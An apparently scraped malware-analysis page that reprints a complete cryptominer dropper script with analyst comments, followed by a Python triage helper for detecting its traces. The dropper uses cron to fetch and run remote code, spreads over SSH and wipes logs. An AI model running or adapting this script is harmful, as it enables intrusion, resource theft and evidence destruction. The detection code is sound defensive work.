Cryptomining trojan
Posted by water-sky
Preface: this article was compiled by the editors of Xiaochangshi (cha138.com) and mainly presents material on cryptomining trojans; we hope it is of some reference value to you.
```bash
# Dropper script recovered from the infected host. The scraped copy had been
# flattened onto three lines with curly quotes; it is reformatted here one
# command per line with analyst comments, otherwise unchanged.

export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin
mkdir -p /tmp
chmod 1777 /tmp

# Persistence: a cron job re-fetches this script every 10 minutes and pipes it into sh
echo "*/10 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh" | crontab -

# Kill competing miners and earlier variants by process-name / pool-name match
ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "sustse"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "axgtbc"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "axgtfa"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "6Tx3Wq"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "dblaunchs"|awk '{print $2}'|xargs kill -9
ps -ef|grep -v grep|grep "/boot/vmlinuz"|awk '{print $2}'|xargs kill -9
rm -rf /tmp/busybox

# Find a writable system directory (each cd only succeeds if the touch did) and
# put it on PATH; the payload is dropped there under the name "sshd"
cd /tmp
touch /usr/local/bin/writeable && cd /usr/local/bin/
touch /usr/libexec/writeable && cd /usr/libexec/
touch /usr/bin/writeable && cd /usr/bin/
rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable
export PATH=$PATH:$(pwd)

# /tmp/.XImunix holds the PID of a running payload; only (re)download if it is absent or dead.
# The payload is fetched from image-hosting URLs (disguised as .png/.jpg), chosen by CPU architecture.
if [ ! -f "/tmp/.XImunix" ] || [ ! -f "/proc/$(cat /tmp/.XImunix)/io" ]; then
    chattr -i sshd
    rm -rf sshd
    ARCH=$(uname -m)
    if [ ${ARCH}x = "x86_64x" ]; then
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190603/9f283ac6216b4865bf5e269e2dba47b3.png -o sshd||
         wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190603/9f283ac6216b4865bf5e269e2dba47b3.png -O sshd||
         curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_angVqYHOYGajYbFSHGRR.jpg -o sshd||
         wget --timeout=30 --tries=3 -q hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_angVqYHOYGajYbFSHGRR.jpg -O sshd||
         curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574171568/3.864055421690409.jpg -o sshd||
         wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574171568/3.864055421690409.jpg -O sshd) && chmod +x sshd
    else
        (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL img.sobot.com/chatres/89/msg/20190603/ab4e5d2c70904590b3f8ac1b6f3dd1c0.png -o sshd||
         wget --timeout=30 --tries=3 -q img.sobot.com/chatres/89/msg/20190603/ab4e5d2c70904590b3f8ac1b6f3dd1c0.png -O sshd||
         curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_CXIcRlREbdbjfNuhRIYp.jpg -o sshd||
         wget --timeout=30 --tries=3 -q hTTps://yzf.qq.com/fsnb/kf-file/kf_pic/20190603/KFPIC_h51c40795830e309c3bb10ea7740_WXIMAGE_CXIcRlREbdbjfNuhRIYp.jpg -O sshd||
         curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574229581/6.470362475964859.jpg -o sshd||
         wget --timeout=30 --tries=3 -q cdn.xiaoduoai.com/cvd/dist/fileUpload/1559574229581/6.470362475964859.jpg -O sshd) && chmod +x sshd
    fi
    $(pwd)/sshd || /usr/bin/sshd || /usr/libexec/sshd || /usr/local/bin/sshd || sshd || ./sshd || /tmp/sshd || /usr/local/sbin/sshd
fi

# Lateral movement: every IPv4 address in root's known_hosts is contacted over
# key-based SSH (BatchMode, no host-key check) and told to fetch and run this script
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do
        ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' &
    done
fi

# The same for every user under /home
for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do
                ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh >/dev/null 2>&1 &' &
            done
        fi
    fi
done

# Anti-forensics: "0>FILE" redirects fd 0 to FILE for writing, truncating each log to zero bytes
echo 0>/var/spool/mail/root
echo 0>/var/log/wtmp
echo 0>/var/log/secure
echo 0>/var/log/cron
#
```
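The script above is a cryptominer dropper: it installs a cron job that re-fetches it from lsd.systemten.org every ten minutes, kills competing miners, drops an architecture-specific payload disguised as an image into a writable system directory under the name sshd, records the payload PID in /tmp/.XImunix, spreads over SSH to every IPv4 address in known_hosts, and truncates wtmp, secure, cron and root's mailbox with `echo 0>FILE`. The following triage helper is an added example and not part of the original page: it checks offline copies of a crontab, a `ps -ef` listing, a file inventory and log sizes for exactly those indicators. The indicator values are taken from the script on this page; all sample inputs are constructed, and the function names are this example's own.

```python
"""Defender-side triage for the cron/SSH-spreading miner dropper shown above.

Each function takes a snapshot collected from a host (or a forensic image)
and returns a list of findings, so it can run offline against saved artefacts.
"""
import re

# --- Indicators lifted from the dropper script on this page ---------------
C2_HOST = "lsd.systemten.org"                 # host the cron job fetches from
MARKER_FILE = "/tmp/.XImunix"                 # PID file the dropper checks
# Paths the dropper tries to launch its fake "sshd" from. The genuine daemon on
# most distributions is /usr/sbin/sshd, which is deliberately not in this set.
DROPPED_SSHD_PATHS = {
    "/usr/bin/sshd", "/usr/libexec/sshd", "/usr/local/bin/sshd",
    "/tmp/sshd", "/usr/local/sbin/sshd", "./sshd",
}
# Logs the dropper truncates with `echo 0>FILE`
WIPED_LOGS = ["/var/spool/mail/root", "/var/log/wtmp", "/var/log/secure", "/var/log/cron"]

# Generic pattern: a curl/wget download piped straight into sh inside a cron entry
PIPE_TO_SH = re.compile(r"\b(curl|wget)\b.*\|\s*sh\b")


def cron_findings(crontab_text):
    """One finding per cron line that names the C2 host or pipes a download into sh."""
    findings = []
    for line in crontab_text.splitlines():
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if C2_HOST in stripped:
            findings.append(("cron_c2_host", stripped))
        elif PIPE_TO_SH.search(stripped):
            findings.append(("cron_pipe_to_sh", stripped))
    return findings


def sshd_findings(ps_lines):
    """Flag processes whose command is an sshd binary started from one of the drop paths."""
    findings = []
    for line in ps_lines:
        parts = line.split()
        if len(parts) < 8:
            continue
        cmd = parts[7]  # `ps -ef` columns: UID PID PPID C STIME TTY TIME CMD
        if cmd in DROPPED_SSHD_PATHS:
            findings.append(("sshd_from_drop_path", parts[1], cmd))
    return findings


def marker_findings(existing_files):
    """The dropper only re-infects when its PID file is missing; its presence is itself an IoC."""
    return [("marker_file", MARKER_FILE)] if MARKER_FILE in existing_files else []


def wiped_log_findings(file_sizes):
    """Zero-byte wtmp/secure/cron on a host that has been up for a while points at log wiping."""
    return [("log_truncated", path) for path in WIPED_LOGS if file_sizes.get(path) == 0]


def triage(crontab_text, ps_lines, existing_files, file_sizes):
    """Run every check and concatenate the findings."""
    return (cron_findings(crontab_text) + sshd_findings(ps_lines)
            + marker_findings(existing_files) + wiped_log_findings(file_sizes))


# --- Constructed sample artefacts (not from a real host) --------------------
SAMPLE_CRONTAB = """\
# constructed sample: one legitimate job plus the persistence entry from the page
0 3 * * * /usr/local/bin/backup.sh
*/10 * * * * (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh
"""
SAMPLE_PS = [
    "UID        PID  PPID  C STIME TTY          TIME CMD",
    "root         1     0  0 Jun03 ?        00:00:03 /sbin/init",
    "root       812     1  0 Jun03 ?        00:00:00 /usr/sbin/sshd -D",
    "root      4711     1 99 10:02 ?        01:12:44 /usr/local/bin/sshd",
]
SAMPLE_FILES = {"/tmp/.XImunix", "/usr/local/bin/sshd"}
SAMPLE_SIZES = {
    "/var/spool/mail/root": 0, "/var/log/wtmp": 0,
    "/var/log/secure": 0, "/var/log/cron": 48213,
}

if __name__ == "__main__":
    for finding in triage(SAMPLE_CRONTAB, SAMPLE_PS, SAMPLE_FILES, SAMPLE_SIZES):
        print(finding)
```

On a live host the inputs would come from `crontab -l` (for root and every user), `ps -ef`, and `stat` on the listed paths; the process check keys on the binary path rather than the name "sshd" precisely because the dropper chose that name to blend in.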
The above is the main content on cryptomining trojans; if it did not solve your problem, please refer to the following articles:
Incident response: a record of a cryptomining trojan discovered unexpectedly during an emergency vulnerability fix (Shiro deserialization vulnerability and the ddg mining trojan)